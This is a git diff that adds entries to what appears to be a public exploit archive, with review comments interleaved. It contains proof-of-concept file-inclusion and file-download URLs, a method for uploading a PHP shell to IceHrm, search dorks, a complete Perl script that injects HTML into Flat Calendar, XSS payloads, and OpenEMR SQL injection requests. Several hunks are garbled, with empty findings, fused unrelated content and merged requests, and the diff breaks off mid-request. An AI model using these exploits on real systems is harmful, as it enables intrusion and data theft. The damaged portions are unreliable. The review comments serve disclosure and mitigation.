diff --git a/files.csv b/files.csv
index aa838193d..7b18abe82 100755
--- a/files.csv
+++ b/files.csv
@@ -31968,6 +31968,9 @@ id,file,description,date,author,platform,type,port
35487,platforms/php/dos/35487.php,"PHP 5.x OpenSSL Extension x Function openssl_decrypt Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0
35489,platforms/multiple/dos/35489.pl,"Perl 5.x 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
+35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0
+35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0
+35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0
35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0
35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0
35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 Multiple Cross Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0
@@ -31977,9 +31980,15 @@ id,file,description,date,author,platform,type,port
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
+35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0
35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0
+35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 'jobVacancy.php' Cross Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0
+35515,platforms/php/webapps/35515.txt,"Alkacon OpenCms 7.5.x Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0
+35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
+35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
+35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
diff --git a/platforms/php/webapps/35490.txt b/platforms/php/webapps/35490.txt
new file mode 100755
index 000000000..400848242
--- /dev/null
+++ b/platforms/php/webapps/35490.txt
@@ -0,0 +1,238 @@
+?
+IceHrm <=7.1 Multiple Vulnerabilities
+
+
+Vendor: IceHRM
+Product web page: http://www.icehrm.com
+Affected version: <= 7.1
+
+
+Summary: IceHrm is Human Resource Management web software
+for small and medium sized organizations. The software is
+written in PHP. It has community (free), commercial and
+hosted (cloud) solution.
+
+Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
+including Local File Inclusion, Cross-Site Scripting, Malicious
+File Upload, Cross-Site Request Forgery and Code Execution.
+
+Tested on: Apache/2.2.15 (Unix)
+ PHP/5.3.3
+ MySQL 5.1.73
+
+
+Vulnerabilities discovered by Stefan 'sm' Petrushevski
+ @zeroscience
+
+
+Advisory ID: ZSL-2014-5215
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php
+
+
+01.12.2014
+
+---
+
+
+1. Local File Inclusion (LFI)
+#####################################################
+File:
+app/index.php
+
+Vulnerable code:
+---- snip ----
+include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
+app/?g=../&n=../../../../etc/passwd%00
+---- snip ----
+
+Proof of Concept (PoC):
+http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00
+
+Severity: CRITICAL
+#####################################################
+
+
+2. Local File Inclusion (LFI)
+#####################################################
+File:
+service.php
+
+Vulnerable code:
+---- snip ----
+if($action == 'download'){
+ $fileName = $_REQUEST['file'];
+ $fileName = CLIENT_BASE_PATH.'data/'.$fileName;
+ header('Content-Description: File Transfer');
+ header('Content-Type: application/octet-stream');
+ header('Content-Disposition: attachment; filename='.basename($fileName));
+ header('Content-Transfer-Encoding: binary');
+ header('Expires: 0');
+ header('Cache-Control: must-revalidate');
+ header('Pragma: public');
+ header('Content-Length: ' . filesize($fileName));
+ ob_clean();
+ flush();
+ readfile($fileName);
+---- snip ----
+
+Proof of Concept (PoC):
+http://zsltest/icehrm/app/service.php?a=download&file=../config.php
+
+Severity: CRITICAL
+#####################################################
+
+
+3. Malicious File Upload / Code Execution
+#####################################################
+File:
+fileupload.php
+
+Vulnerable code:
+---- snip ----
+//Generate File Name
+$saveFileName = $_POST['file_name'];
+if(empty($saveFileName) || $saveFileName == "_NEW_"){
+ $saveFileName = microtime();
+ $saveFileName = str_replace(".", "-", $saveFileName);
+}
+
+$file = new File();
+$file->Load("name = ?",array($saveFileName));
+
+// list of valid extensions, ex. array("jpeg", "xml", "bmp")
+
+$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
+// max file size in bytes
+$sizeLimit =MAX_FILE_SIZE_KB * 1024;
+$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
+$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
+// to pass data through iframe you will need to encode all html tags
+
+if($result['success'] == 1){
+ $file->name = $saveFileName;
+ $file->filename = $result['filename'];
+ $file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
+ $file->file_group = $_POST['file_group'];
+ $file->Save();
+ $result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
+ $result['data'] .= "|".$saveFileName;
+ $result['data'] .= "|".$file->id;
+}
+---- snip ----
+
+Proof of Concept (PoC) method:
+1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
+Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
+2. Create a malicious file (php shell) save it with .txt extension
+3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.
+4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.
+
+PoC example:
+1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
+2. xxx.txt contents:
+
+3. Upload the filename
+4. Access the file:
+
+Severity: CRITICAL
+#####################################################
+
+
+4. Cross-Site Scripting (XSS)
+#####################################################
+File:
+login.php
+
+Vulnerable code:
+---- snip ----
+
+
+Severity: MEDIUM
+#####################################################
+
+
+5. Cross-Site Scripting (XSS)
+#####################################################
+File:
+fileupload_page.php
+
+Vulnerable code:
+---- snip ----
+
+
//
+-----------------------------147872036312473
+Content-Disposition: form-data; name="icon"
+
+look/images/icons/i1.gif
+-----------------------------147872036312473
+Content-Disposition: form-data; name="insert"
+
+Save
+-----------------------------147872036312473--
+
+
+
+ --==[[ Greetz To ]]==--
+############################################################################################
+#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
+#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
+#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
+#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk
+#############################################################################################
+ --==[[Love to]]==--
+# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
+#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
+ --==[[ Special Fuck goes to ]]==--
+ <3 suriya Cyber Tyson <3
\ No newline at end of file
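Review bot: None of the three findings that still have content says how to fix the flaw, and the same gap exists in 35493.txt and in 35514.txt through 35517.txt. I would add a `Mitigation:` line under each `Severity:` line, for finding 1 `Mitigation: map g and n to an allow-list of module directories before building the include path` and for finding 2 `Mitigation: resolve the path with realpath() and refuse anything outside CLIENT_BASE_PATH.'data/'`. For finding 3 the line should say that the client-supplied `file_name` must not choose the stored name and that the `data` directory should not be served as executable content. The hunk also looks damaged: findings 4 and 5 have empty snips, the `//` line has no `+` marker inside a new-file hunk, and the multipart body and greetings after it do not belong to this advisory. Since files.csv adds 35491.txt with no file section visible here, the two entries may have been fused when markup was stripped and should be regenerated from the original patch.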
diff --git a/platforms/php/webapps/35493.txt b/platforms/php/webapps/35493.txt
new file mode 100755
index 000000000..358638426
--- /dev/null
+++ b/platforms/php/webapps/35493.txt
@@ -0,0 +1,41 @@
+######################
+
+# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
+
+# Exploit Author : Claudio Viviani
+
+# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
+
+# Software Link : Premium
+
+# Dork Google: inurl:ajax-store-locator
+# index of ajax-store-locator
+
+# Date : 2014-12-06
+
+# Tested on : Windows 7 / Mozilla Firefox
+# Linux / Mozilla Firefox
+
+######################
+
+# PoC Exploit:
+
+http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]
+
+"download_file" variable is not sanitized.
+
+
+#####################
+
+Discovered By : Claudio Viviani
+ http://www.homelab.it
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################
\ No newline at end of file
diff --git a/platforms/php/webapps/35506.pl b/platforms/php/webapps/35506.pl
new file mode 100755
index 000000000..ef087c9d1
--- /dev/null
+++ b/platforms/php/webapps/35506.pl
@@ -0,0 +1,130 @@
+#!/usr/bin/perl -w
+#Title : Flat Calendar v1.1 HTML Injection Exploit
+#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
+#Author : ZoRLu / zorlu@milw00rm.com
+#Website : http://milw00rm.com / its online
+#Twitter : https://twitter.com/milw00rm or @milw00rm
+#Test : Windows7 Ultimate
+#Date : 08/12/2014
+#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
+#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
+#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
+#Dork2 : inurl:"viewEvent.php?eventNumber="
+#
+#C:\Users\admin\Desktop>perl flat.pl
+#
+#Usage: perl flat.pl http://server /calender_path/ indexfile nickname
+#Exam1: perl flat.pl http://server / index.html ZoRLu
+#Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu
+#
+#C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu
+#
+#[+] Target: http://server
+#[+] Path: /member_content/diaries/womens/calendar/
+#[+] index: index.html
+#[+] Nick: ZoRLu
+#[+] Exploit Succes
+#[+] Searching url...
+#[+] YourEventNumber = 709
+#[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709
+
+use HTTP::Request::Common qw( POST );
+use LWP::UserAgent;
+use IO::Socket;
+use strict;
+use warnings;
+
+sub hlp() {
+
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n";
+print "Exam1: perl $0 http://server / index.html ZoRLu\n";
+print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n";
+
+}
+
+if(@ARGV != 4) {
+
+hlp();
+exit();
+
+}
+
+my $ua = LWP::UserAgent->new;
+my $url = $ARGV[0];
+my $path = $ARGV[1];
+my $index = $ARGV[2];
+my $nick = $ARGV[3];
+my $vuln = $url . $path . "admin/calAdd.php";
+
+print "\n[+] Target: ".$url."\n";
+print "[+] Path: ".$path."\n";
+print "[+] index: ".$index."\n";
+print "[+] Nick: ".$nick."\n";
+
+my @months = qw(January February March April May June July August September October November December);
+my ($day, $month, $yearset) = (localtime)[3,4,5];
+my $year = 1900 + $yearset;
+my $moon = $months[$month];
+
+if (open(my $fh, $index)) {
+
+while (my $row = <$fh>) {
+chomp $row;
+
+my $req = POST $vuln, [
+ event => 'Test Page',
+ description => $row,
+ month => $moon,
+ day => $day,
+ year => $year,
+ submitted => $nick,
+];
+
+
+my $resp = $ua->request($req);
+if ($resp->is_success) {
+ my $message = $resp->decoded_content;
+ my $regex = "Record Added: taking you back";
+ if ($message =~ /$regex/) {
+ print "[+] Exploit Succes\n";
+
+ my $newua = LWP::UserAgent->new( );
+ my $newurl = $url . $path . "calendar.php";
+ my $newreq = $newua->get($newurl);
+ if ($newreq->is_success) {
+ my $newmessage = $newreq->decoded_content;
+
+ my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
+ print "[+] Searching url...\n";
+ my $request = substr($newmessage, $first+26, 4);
+ print "[+] YourEventNumber = $request\n";
+ sleep(1);
+ print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
+
+ }
+
+else {
+ print "[-] HTTP POST error code: ", $newreq->code, "\n";
+ print "[-] HTTP POST error message: ", $newreq->message, "\n";
+}
+
+ }
+ else {
+
+ print "[-] Exploit Failed";
+
+ }
+}
+else {
+ print "[-] HTTP POST error code: ", $resp->code, "\n";
+ print "[-] HTTP POST error message: ", $resp->message, "\n";
+ }
+ }
+}
+else {
+
+sleep(1);
+die ("[-] NotFound: $index\n");
+
+}
\ No newline at end of file
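Review bot: The header comment lists usage and search dorks but never states the flaw. The script posts to `admin/calAdd.php` with a fresh `LWP::UserAgent` and no login or cookie, which suggests the admin add endpoint accepts unauthenticated submissions and stores `description` without encoding. I would add after the `#Title` line `# Root cause (inferred from this script): admin/calAdd.php stores event fields without authentication or output encoding` and `# Mitigation: require an admin session for admin/calAdd.php and HTML-encode event fields when they are rendered`. Unexpected POST requests to that path in the web server log are the first thing an operator of this application should look for.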
diff --git a/platforms/php/webapps/35514.txt b/platforms/php/webapps/35514.txt
new file mode 100755
index 000000000..28e0fb92d
--- /dev/null
+++ b/platforms/php/webapps/35514.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47046/info
+
+OrangeHRM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+OrangeHRM 2.6.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/orangehrm-2.6.2/templates/recruitment/jobVacancy.php?recruitcode=%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35515.txt b/platforms/php/webapps/35515.txt
new file mode 100755
index 000000000..b9051eef3
--- /dev/null
+++ b/platforms/php/webapps/35515.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/47055/info
+
+Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to OpenCms 7.5.4 are vulnerable.
+
+http://www.example.com/opencms/opencms/system/workplace/commons/report-locks.jsp?resourcelist=null&resource=/demo_de&includerelated=false">XSSvector
+
+http://www.example.com/opencms/opencms/system/workplace/views/explorer/contextmenu.jsp?resourcelist=/deco_logo.png&acttarget=514f2">XSSvector
\ No newline at end of file
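Review bot: This entry is filed under `platforms/php/webapps` and files.csv gives its platform as `php`, but both example URLs end in `.jsp` under `/system/workplace/`, so the product is evidently served by a Java stack. Anyone filtering the index by platform to check exposure would miss it. The row and path should presumably read `platforms/jsp/webapps/35515.txt` with platform `jsp`, if the repository has that category.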
diff --git a/platforms/php/webapps/35516.txt b/platforms/php/webapps/35516.txt
new file mode 100755
index 000000000..015f5b2e5
--- /dev/null
+++ b/platforms/php/webapps/35516.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/47065/info
+
+webEdition CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.
+
+webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
+http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
\ No newline at end of file
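Review bot: Both example URLs depend on a trailing `%00`, and the advisory does not say that this truncation only works on PHP builds that still accept NUL bytes in file paths (older than 5.3.4, as far as I know). A line such as `Note: relies on NUL-byte path truncation, which current PHP releases reject` would tell a defender how exposure depends on the runtime. The same caveat applies to finding 1 in 35490.txt, which was tested on PHP/5.3.3. That the injected parameter is named `DOCUMENT_ROOT` also hints at a dependency on register_globals, which should be confirmed and stated.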
diff --git a/platforms/php/webapps/35517.txt b/platforms/php/webapps/35517.txt
new file mode 100755
index 000000000..c3fb15687
--- /dev/null
+++ b/platforms/php/webapps/35517.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47068/info
+
+pppBLOG is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+pppBLOG 0.3.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/search.php?q=
\ No newline at end of file
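Review bot: The example URL stops at `search.php?q=` with no value, so the entry does not show which input reaches the page unencoded; the original markup was probably stripped when the file was generated. I would either restore the line from the referenced BID page or append `[value removed during import - see source]`, so that readers do not take the bare URL for the complete report.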
diff --git a/platforms/php/webapps/35518.txt b/platforms/php/webapps/35518.txt
new file mode 100755
index 000000000..bdf13512d
--- /dev/null
+++ b/platforms/php/webapps/35518.txt
@@ -0,0 +1,268 @@
+Vulnerability title: Multiple Authenticated SQL Injections In OpenEMR
+CVE: CVE-2014-5462
+Vendor: OpenEMR
+Product: OpenEMR
+Affected version: 4.1.2(7) and earlier
+Fixed version: N/A
+Reported by: Jerzy Kramarz
+Details:
+
+SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database.
+
+The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:
+
+Request 1
+
+POST /openemr/interface/super/edit_layout.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7
+[...]
+Content-Length: 134
+
+formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS
+
+
+Request 2
+
+POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
+[...]
+Content-Length: 135
+
+form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1&form_drug_name=a&form_lot_number=1
+
+
+Request 3
+
+POST /openemr/interface/billing/edit_payment.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Content-Length: 186
+Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
+
+CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1&method=enable HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
+Connection: keep-alive
+
+
+Request 5
+
+POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
+
+----------1034262177
+Content-Disposition: form-data; name="form_pid"
+
+5
+----------1034262177
+Content-Disposition: form-data; name="form_without"
+
+on
+----------1034262177
+Content-Disposition: form-data; name="form_deposit_date"
+
+5
+----------1034262177
+Content-Disposition: form-data; name="form_paydate"
+
+5
+----------1034262177
+Content-Disposition: form-data; name="form_category"
+
+All
+----------1034262177
+Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
+Content-Type: text/plain
+
+boom
+----------1034262177
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+5000000
+----------1034262177
+Content-Disposition: form-data; name="form_amount"
+
+5
+----------1034262177
+Content-Disposition: form-data; name="form_encounter"
+
+5
+----------1034262177
+Content-Disposition: form-data; name="form_to_date"
+
+5
+----------1034262177
+Content-Disposition: form-data; name="form_payer_id"
+
+2
+----------1034262177
+Content-Disposition: form-data; name="form_source"
+
+5
+----------1034262177
+Content-Disposition: form-data; name="form_name"
+
+BOOOM
+----------1034262177
+Content-Disposition: form-data; name="form_search"
+
+Search
+----------1034262177
+Content-Disposition: form-data; name="form_date"
+
+5-5-5
+----------1034262177--
+
+
+
+Request 6
+
+GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
+
+
+Request 7
+
+POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
+
+form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4&form_from_date=0000-00-
+
+
+Request 8
+
+POST /openemr/interface/orders/pending_followup.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original
+
+form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5&form_from_date=2014-07-25
+
+
+Request 9
+
+POST /openemr/interface/orders/pending_orders.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
+
+form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4&form_from_date=2014-07-25
+
+
+Request 10
+
+POST /openemr/interface/patient_file/deleter.php?patient=&encounterid=&formid=&issue=&document=&payment=&billing=&transaction= HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
+
+form_submit=Yes%2c+Delete+and+Log
+
+
+Request 11
+
+POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
+
+Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5
+
+
+Request 12
+
+POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
+
+text=5&form_addr2=1&form_attn=5&form_country=U&form_freeb_type=2&form_phone=555-555-5555&form_partner=&form_name=P&form_zip=36&form_save=Save+as+New&form_state=W&form_city=W&form_cms_id=5
+
+
+Request 14
+
+POST /openemr/interface/patient_file/problem_encounter.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=p0locr2jieuagul105rkm95ob6
+
+form_pelist=%2f&form_pid=0&form_save=Save&form_key=e
+
+
+Request 15
+
+POST /openemr/interface/reports/appointments_report.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
+
+form_show_available=on&form_refresh=&form_to_date=2014-07-25&patient=&form_provider=1&form_apptstatus=&with_out_facility=on&form_facility=4&form_apptcat=9&form_from_date=2014-07-25&with_out_provider=on&form_orderby=date
+
+
+Request 16
+
+POST /openemr/interface/patient_file/summary/demographics_save.php HTTP/1.1
+Host: 192.168.56.102
+[...]
+Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6; pma_lang=en; pma_collation_connection=utf8_general_ci
+
+form_i2subscriber_employer_country=USA&i3subscriber_DOB=0000-00-00&i3accept_assignment=FALSE&i3subscriber_city=Winterville&form_hipaa_mail=NO&form_allow_imm_info_share=NO&form_street=5&i3effective_date=0000-00-00&form_i1subscriber_state=AL&form_interpretter=5&i1subscriber_lname=boom&form_title=Mr.&i1subscriber_fname=boom&form_fname=Asd&form_i1subscriber_employer_state=AL&form_i1subscriber_relationship=self&form_i1subscriber_country=USA&form_i3subscriber_employer_state=AL&form_contact_relationship=5&form_mothersname=boom&i2group_number=5&form_em_state=AL&form_i3subscriber_country=USA&form_allow_patient_portal=NO&i2copay=5&i2policy_number=5&form_i2subscriber_sex=Female&i1accept_assignment=FALSE&i3subscriber_postal_code=SW1A+1AA&i2subscriber_ss=5&i1subscriber_mname=boom&form_pharmacy_id=0&i3subscriber_phone=5&form_phone_home=5&form_lname=Asd&mode=save&form_i2subscriber_country=USA&i2subscriber_employer=5&db_id=1 &form_i1subscriber_employer_country=USA&form_d
+ eceased_reason=5&form_i2subscriber_state=AL&form_city=Winterville&form_email=winter@example.com&i3subscriber_employer_street=5&form_genericval2=asd&i3group_number=5&form_em_street=5&form_genericval1=asd&form_language=armenian&i1provider=&i2provider=&form_em_city=Winterville&form_em_name=boom&i3subscriber_fname=boom&form_race=amer_ind_or_alaska_native&i1plan_name=boom&i3subscriber_employer_city=Winterville&form_pubpid=asd&form_mname=Asd&i2subscriber_employer_street=5&form_financial_review=0000-00-00+00%3a00%3a00&i3subscriber_mname=boom&i3provider=&i3subscriber_employer_postal_code=SW1A+1AA&form_country_code=USA&form_em_country=USA&i2subscriber_phone=5&i3policy_number=5&form_status=married&form_ss=asdasd&form_monthly_income=01&i1effective_date=0000-00-00&form_i2subscriber_relationship=self&i3plan_name=boom&i1subscriber_employer_street=5&i1subscriber_city=Winterville&form_allow_imm_reg_use=NO&form_drivers_license=asd&form_i3subscriber_employer_country=USA&form_em_postal_code=SW
+ 1A+1AA&form_hipaa_message=30&i1subscriber_employer_city=Winterville&i1subscriber_postal_code=SW1A+1AA&i3copay=5&i1copay=5&i3subscriber_street=5&i3policy_type=12&i1subscriber_street=5&form_vfc=eligible&form_i2subscriber_employer_state=AL&i2subscriber_street=5&form_guardiansname=boom&i1policy_number=5&i3subscriber_lname=boom&form_phone_contact=5&i2subscriber_employer_postal_code=SW1A+1AA&form_homeless=5&form_i1subscriber_sex=Female&form_i3subscriber_state=AL&form_referral_source=Patient&i2subscriber_fname=boom&i1subscriber_ss=5&form_providerID=1&form_state=AL&form_postal_code=SW1A+1AA&form_hipaa_allowsms=NO&i1subscriber_DOB=0000-00-00&i2subscriber_employer_city=Winterville&form_hipaa_allowemail=NO&form_DOB=1994-02-07&form_deceased_date=0000-00-00+00%3a00%3a00&i2effective_date=0000-00-00&i2subscriber_DOB=0000-00-00&i2subscriber_postal_code=SW1A+1AA&form_genericname2=asdasd&form_genericname1=asasd&i1group_number=5&i2subscriber_mname=boom&i2accept_assignment=FALSE&i1subscriber_em
